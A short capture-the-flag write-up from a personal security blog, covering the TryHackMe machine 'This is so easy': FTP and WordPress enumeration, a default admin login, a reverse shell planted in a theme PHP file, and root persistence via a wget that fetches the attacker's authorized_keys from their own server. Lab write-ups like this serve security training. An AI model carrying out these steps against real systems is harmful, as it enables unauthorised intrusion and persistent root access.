🐧
Jackmeister
  • Welcome
  • Misc
    • Resources
    • Cybersecurity Terms You MUST KNOW
  • PG Play
    • Amaterasu
  • Hack The Box
    • Linux
      • Bashed
      • Beep
      • Sau
      • Trick
      • Knife
      • Love
      • Spectra
      • TheNotebook
      • Previse
      • Ophiuchi
      • Shocker
      • Bank
      • Keeper
      • Help
      • Cronos
      • Lame
    • Active Directory
      • Active
      • Forest
      • Timelapse
      • Sauna
    • HTB Register Form
  • TryHackMe
    • Red
    • Year of the Jellyfish
    • S1mple0nly b2r
    • Hermoso
    • This is so easy
    • Altair Network
    • road.thm
  • Platforms
    • Websites and Platforms
  • Tools
    • Hacking Tools
  • B2R template
Powered by GitBook
On this page
  1. TryHackMe

This is so easy

This is So Easy is a easy boot2root machine created by one of the crew, Choo during MCC2022 event

PreviousHermosoNextAltair Network

Last updated 2 years ago

Saturday, 5 June, 2021 4:07 PM

We can see that open ports :

21(ftp) 22(ssh) 80(ssh)

Ftp into port 21 with anonymous got us a note

Clicking wordpress redirect us to

So we add the domain name to /etc/hosts

wpscan identified 2 users

Attempting to login as administrator and admin as password was successful , we edit the php file to upload our reverse shell

Then we run this error file located in our template

gtfobins

Getting a stable shell through ssh

We can see that root contains .ssh folder

We can add our own public key into authorized_keys to gain ssh access as root

On our own terminal , create ssh key

Copy the key into "authorized_keys" file to replace "authorized_keys" On target machine with our public key

Open server for the target machine to get the file

On target machine , remove the "authorized_keys" file and download

Attacking machine's "authorized_keys" using wget

wget http://THM_IP:8000/authorized_keys

Check him out !